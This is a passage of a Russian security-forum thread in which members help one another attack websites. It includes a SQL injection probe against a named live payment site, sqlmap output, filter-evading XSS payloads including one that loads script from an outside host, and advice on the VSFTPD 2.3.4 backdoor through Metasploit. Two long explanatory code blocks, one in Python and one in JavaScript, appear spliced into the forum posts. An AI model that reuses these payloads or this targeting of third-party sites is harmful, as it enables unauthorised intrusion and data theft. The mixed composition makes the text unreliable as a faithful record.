Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by +, 27 Apr 2015.

  1. karkajoi (Active Member)
    It probably won't work because, most likely, it just isn't there; at least I didn't see anything unusual))
    There is a potential one in another place
    Code:
    https://naira2usd.com/confirmx
    POST
    draw=2&columns[0][data]=&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&start=0&length=100&search[value]='&search[regex]=false
    
     
    #2681 karkajoi, 21 Aug 2019
    Last edited: 21 Aug 2019
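The request above ends with `search[value]='`, the classic single-quote probe against a DataTables server-side endpoint. The script below is an added example, not code from the thread or from the target site: it parses that body the way a DataTables handler would, then runs it against a string-built query and against a parameterized one. The table, rows and the `confirmations` name are constructed for the demo; the real endpoint's schema is unknown.

```python
import sqlite3
from urllib.parse import parse_qs

# The DataTables body from the post above, trimmed to the parameters a
# server-side handler actually uses (the columns[...] entries are dropped).
POSTED_BODY = "draw=2&start=0&length=100&search[value]='&search[regex]=false"


def parse_datatables(body: str) -> dict:
    """Extract start/length/search[value] from a DataTables server-side request."""
    qs = parse_qs(body, keep_blank_values=True)
    return {
        "start": int(qs.get("start", ["0"])[0]),
        "length": int(qs.get("length", ["10"])[0]),
        "search": qs.get("search[value]", [""])[0],
    }


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table; the real endpoint's schema is unknown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE confirmations (id INTEGER, ref TEXT, amount INTEGER)")
    conn.executemany(
        "INSERT INTO confirmations VALUES (?, ?, ?)",
        [(1, "TX-100", 5000), (2, "TX-200", 7500), (3, "TX-300", 125)],
    )
    return conn


def query_vulnerable(conn: sqlite3.Connection, params: dict) -> list:
    """String-built query: search[value] lands inside the SQL text itself."""
    sql = (
        "SELECT id, ref, amount FROM confirmations "
        f"WHERE ref LIKE '%{params['search']}%' "
        f"LIMIT {params['length']} OFFSET {params['start']}"
    )
    return conn.execute(sql).fetchall()


def query_safe(conn: sqlite3.Connection, params: dict) -> list:
    """Parameterized query: the value is bound and never parsed as SQL."""
    sql = "SELECT id, ref, amount FROM confirmations WHERE ref LIKE ? LIMIT ? OFFSET ?"
    args = (f"%{params['search']}%", params["length"], params["start"])
    return conn.execute(sql, args).fetchall()


def probe(body: str) -> dict:
    """Feed one request body to both handlers and record how each reacts."""
    params = parse_datatables(body)
    conn = make_db()
    out = {"safe": query_safe(conn, params), "vulnerable": None, "error": None}
    try:
        out["vulnerable"] = query_vulnerable(conn, params)
    except sqlite3.OperationalError as exc:  # a syntax error here is the tell
        out["error"] = str(exc)
    return out


if __name__ == "__main__":
    for body in (
        POSTED_BODY,
        "draw=3&start=0&length=100&search[value]=TX-2&search[regex]=false",
        "draw=4&start=0&length=100&search[value]=%27%20OR%20%271%27%3D%271&search[regex]=false",
    ):
        print(body, "->", probe(body))
```

The lone quote only proves the value reaches the SQL parser (the string-built handler throws a syntax error, the parameterized one just finds no rows); the third body shows why that matters, since `' OR '1'='1` makes the vulnerable handler return every row while the safe handler still returns nothing. On a real target the equivalent signal is a 500 or a DBMS error message in the response.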
  2. Octavian (Member)
    Can X-Requested-With only be bypassed via .swf?
     
  3. kostea (New Member)
  4. AngelEyes (New Member)
    [01:38:29] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL 5 (MariaDB fork)
    [01:38:29] [INFO] fetching database names
    [01:38:29] [INFO] fetching number of databases
    [01:38:30] [INFO] resumed: ЩЩ
    [01:38:30] [ERROR] unable to retrieve the number of databases
    [01:38:30] [INFO] falling back to current database
    [01:38:30] [INFO] fetching current database
    [01:38:30] [WARNING] cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files
    [01:38:30] [INFO] resumed: `к?
    available databases [1]:
    [*] `к?
    How do I deal with this?
     
  5. karkajoi (Active Member)
    try --hex
     
  6. AngelEyes (New Member)
    Tried it, went through all the tampers too
     
  7. Octavian (Member)
    What can the () be replaced with in

    <script>alert(1)</script>
     
  8. Baskin-Robbins (Reservists Of Antichat)
    try alert`aaa`
    here's an example for you: https://forum.antichat.ru/threads/424991/page-17

    but if something like this works, you don't need the alert at all
    <script src=//lala.com/lala.js>
     
  9. Octavian (Member)
    Without leaving <script>, I need to execute the XSS without ; ( )
     
  10. karkajoi (Active Member)
    Charencode helps bypass "The URI you submitted has disallowed characters.", but the vector fails. :(
     
  11. crlf (Green member)
    Code:
    document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//
    
     
    Octavian likes this.
  12. Bo0oM (Member)
    Code:
    onerror=eval;throw'=alert\x281\x29'
    I like this one more (with the payload written to window.name beforehand, which is carried along within the same window)

    Code:
    onerror=eval;throw window.name
     
    Octavian likes this.
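The three answers to Octavian's "no ; ( )" constraint (Baskin-Robbins' tagged template, crlf's hex-escaped innerHTML string, Bo0oM's onerror/throw) each reach a function call by a different route. The script below is an added example, not code from any of the posters: it runs under Node with a stand-in `alert` installed on `globalThis`, decodes crlf's escapes to show the markup innerHTML receives, checks each posted payload against the forbidden characters, and models the onerror trick. The model assumes Chromium's error-message format `"Uncaught <thrown value>"`; other engines word the message differently, so the trick is engine-dependent.

```javascript
// Added example (not from the thread): what the parenthesis-free XSS
// payloads posted above by Baskin-Robbins, crlf and Bo0oM actually do.
// Runs under Node; a stand-in alert() on globalThis records the calls so
// they can be checked without a browser.

const calls = [];
globalThis.alert = (...args) => { calls.push(args); return args[0]; };

// The payloads exactly as posted, kept as raw text so they can be inspected.
const PAYLOADS = {
  tagged: "alert`aaa`",
  crlf: String.raw`document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//`,
  bo0om: String.raw`onerror=eval;throw'=alert\x281\x29'`,
};

// Octavian's constraint was "no ; ( )": report which of those a payload's
// source text uses. \x28 is not a '(' until the JS parser decodes it.
function forbiddenChars(src) {
  return [...new Set(src)].filter((c) => ";()".includes(c)).sort();
}

// 1. Tagged template: a function can be invoked with a template literal and
//    no parentheses. It receives the strings array, not the text "aaa".
function taggedTemplateCall() {
  calls.length = 0;
  return Array.from(alert`aaa`);
}

// 2. \xNN escapes: the engine decodes them inside a string literal, so the
//    source contains none of < ( ) ; while the resulting markup does.
//    This decoder shows what crlf's string becomes before innerHTML parses
//    it (an <svg onload> inserted via innerHTML does fire, unlike <script>).
function decodeHexEscapes(raw) {
  return raw.replace(/\\x([0-9a-fA-F]{2})/g,
    (_, h) => String.fromCharCode(parseInt(h, 16)));
}
function crlfMarkup() {
  const literal = PAYLOADS.crlf.match(/"([^"]*)"/)[1];
  return decodeHexEscapes(literal);
}

// 3. onerror=eval;throw'...': the thrown string reaches the handler as the
//    error message, which eval then runs as code. Assumption: Chromium's
//    message format "Uncaught <value>", so "Uncaught =alert(1)" parses as
//    the assignment  Uncaught = alert(1). Bo0oM's window.name variant just
//    changes where the thrown string comes from.
function simulateOnerror(thrown) {
  calls.length = 0;
  const onerror = eval;                       // onerror=eval
  let message;
  try { throw thrown; } catch (e) { message = "Uncaught " + e; }
  return onerror(message);                    // indirect eval: global scope
}

console.log(taggedTemplateCall(), calls);
console.log(crlfMarkup());
console.log(simulateOnerror("=alert\x281\x29"), calls);
for (const [name, src] of Object.entries(PAYLOADS)) {
  console.log(name, "uses forbidden chars:", forbiddenChars(src));
}
```

Running it shows why Bo0oM's first payload does not strictly meet Octavian's constraint (it still needs the `;`) while the tagged template and crlf's string pass the character check; the price of crlf's route is that the payload has to survive inside a `<script>` block that already executes, and the price of the onerror route is that it only works where the engine's message text happens to be valid JavaScript.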
  13. Octavian (Member)
    Hi, could you share a decent wordlist for directories? There are plenty of them, but there are never quite enough
     
  14. Baskin-Robbins (Reservists Of Antichat)
    Is a million enough for you? More is not always better
    Code:
    https://github.com/foospidy/payloads/blob/master/owasp/dirbuster/directory-list-2.3-big.txt
     
    #2694 Baskin-Robbins, 8 Sep 2019
    Last edited: 8 Sep 2019
    seostock and Octavian like this.
  15. November15 (New Member)
  16. fandor9 (Well-Known Member)
  17. November15 (New Member)
    That's true, but still, regarding the site. I checked and it seems the FTP port is open there, and I'm wondering how to develop this further (via msf it gives an error saying the injection was performed, but there's no session)
     
  18. fandor9 (Well-Known Member)
    Which msf module are you using? The site itself runs on Moodle, and the FTP port was most likely opened by the hoster.
     
  19. November15 (New Member)
    VSFTPD v2.3.4
     
  20. fandor9 (Well-Known Member)
    The backdoor was only there for a few days, so it's not a given that it's present, or else the hoster really couldn't care less..
     